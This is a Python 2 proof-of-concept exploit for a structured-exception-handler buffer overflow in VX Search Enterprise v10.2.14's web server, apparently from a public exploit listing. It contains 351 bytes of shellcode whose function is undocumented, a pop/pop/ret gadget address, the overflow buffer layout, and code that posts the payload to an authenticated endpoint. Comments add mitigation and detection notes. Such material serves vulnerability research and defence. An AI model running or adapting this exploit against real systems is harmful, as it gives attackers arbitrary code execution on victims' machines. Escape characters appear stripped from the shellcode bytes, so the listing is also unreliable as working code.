#!/usr/bin/python


print "*** VX Search Enterprise v10.2.14 Buffer Overflow (SEH) *** "

# Exploit Title : VX Search Enterprise v10.2.14 Buffer Overflow (SEH)
# Discovery by : W01fier00t
# Twitter : @wolfieroot
# Discovery Date : 22/11/2017
# Software Link : http://www.vxsearch.com/setups/vxsearchent_setup_v10.2.14.exe
# Tested Version : 10.2.14
# Tested on OS : Windows 7 Home Edition sp1
# You will need to enable the web server for this to work.
# You will also need to log in to the VX Search web page for this to work
# (the 'sid' query parameter in the URL below is the session id of that login).
#
# Python 2 proof of concept (print statements, urllib/urllib2). It submits an
# oversized 'command_name' form field to the product's built-in web interface
# on localhost so that the service overwrites a Structured Exception Handler
# (SEH) record with attacker-controlled data.
#
# Defensive reading:
#   * Exposure exists only when the optional web server is enabled, and the
#     request needs a valid session id, so the practical mitigations are to
#     keep the web server disabled or limited to trusted clients and to not
#     run the affected version where untrusted users can log in.
#   * The handler address below is a fixed address inside libspp.dll; the
#     technique presumably relies on that module lacking SafeSEH/ASLR
#     (TODO confirm against the binary) - rebuilding with those mitigations
#     would deny it.
#   * Detection: a POST to /add_command whose 'command_name' value is several
#     hundred bytes long and contains non-printable bytes, typically followed
#     by the web server process crashing or stopping to respond.

import urllib
import urllib2
import socket

# Bad chars x00x0ax0d - bytes the form field cannot carry, so the generated
# shellcode below avoids them.
# Payload size: 351 bytes
# What this shellcode does is not documented in this listing; from the
# service's point of view it is arbitrary code running as the service user.
shellcode = (
"xddxc6xb8x4axecxd2xeaxd9x74x24xf4x5dx2bxc9xb1"
"x52x83xc5x04x31x45x13x03x0fxffx30x1fx73x17x36"
"xe0x8bxe8x57x68x6exd9x57x0exfbx4ax68x44xa9x66"
"x03x08x59xfcx61x85x6exb5xccxf3x41x46x7cxc7xc0"
"xc4x7fx14x22xf4x4fx69x23x31xadx80x71xeaxb9x37"
"x65x9fxf4x8bx0exd3x19x8cxf3xa4x18xbdxa2xbfx42"
"x1dx45x13xffx14x5dx70x3axeexd6x42xb0xf1x3ex9b"
"x39x5dx7fx13xc8x9fxb8x94x33xeaxb0xe6xcexedx07"
"x94x14x7bx93x3exdexdbx7fxbex33xbdxf4xccxf8xc9"
"x52xd1xffx1exe9xedx74xa1x3dx64xcex86x99x2cx94"
"xa7xb8x88x7bxd7xdax72x23x7dx91x9fx30x0cxf8xf7"
"xf5x3dx02x08x92x36x71x3ax3dxedx1dx76xb6x2bxda"
"x79xedx8cx74x84x0exedx5dx43x5axbdxf5x62xe3x56"
"x05x8ax36xf8x55x24xe9xb9x05x84x59x52x4fx0bx85"
"x42x70xc1xaexe9x8bx82x10x45x93x4axf9x94x93x74"
"x98x11x75xe2x4ax74x2ex9bxf3xddxa4x3axfbxcbxc1"
"x7dx77xf8x36x33x70x75x24xa4x70xc0x16x63x8exfe"
"x3exefx1dx65xbex66x3ex32xe9x2fxf0x4bx7fxc2xab"
"xe5x9dx1fx2dxcdx25xc4x8exd0xa4x89xabxf6xb6x57"
"x33xb3xe2x07x62x6dx5cxeexdcxdfx36xb8xb3x89xde"
"x3dxf8x09x98x41xd5xffx44xf3x80xb9x7bx3cx45x4e"
"x04x20xf5xb1xdfxe0x05xf8x7dx40x8exa5x14xd0xd3"
"x55xc3x17xeaxd5xe1xe7x09xc5x80xe2x56x41x79x9f"
"xc7x24x7dx0cxe7x6c")

# 0x1001a136 : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll]
# The classic SEH-overwrite layout: a short NOP sled, the shellcode, padding
# up to the exception record, a 2-byte short jump plus 2 filler bytes in the
# "next SEH" slot, and finally the address of the pop/pop/ret gadget above,
# which becomes the overwritten exception handler.
cmdname = "x90" *16
cmdname += shellcode
cmdname += "A" * 157
cmdname += "xEBx06"
cmdname += "B" *2
cmdname += "x36xa1x01x10"

print " [*] Sending payload!..."
# Authenticated endpoint on the local web interface; 'sid' is a session id
# captured from a prior login (the value here is the author's sample).
url = 'http://127.0.0.1/add_command?sid=f3fdf2603e9ac8f518db9452fee62110'
values = {'command_name' : cmdname}
data = urllib.urlencode(values)
req = urllib2.Request(url, data)

# Fire-and-forget: a one-second timeout is used and a timeout is ignored,
# presumably because a successful trigger leaves the server unable to reply.
# No other error (HTTP error, connection refused) is handled.
try:
response = urllib2.urlopen(req, timeout = 1)
except socket.timeout:
pass

print " [*] DONE! :D "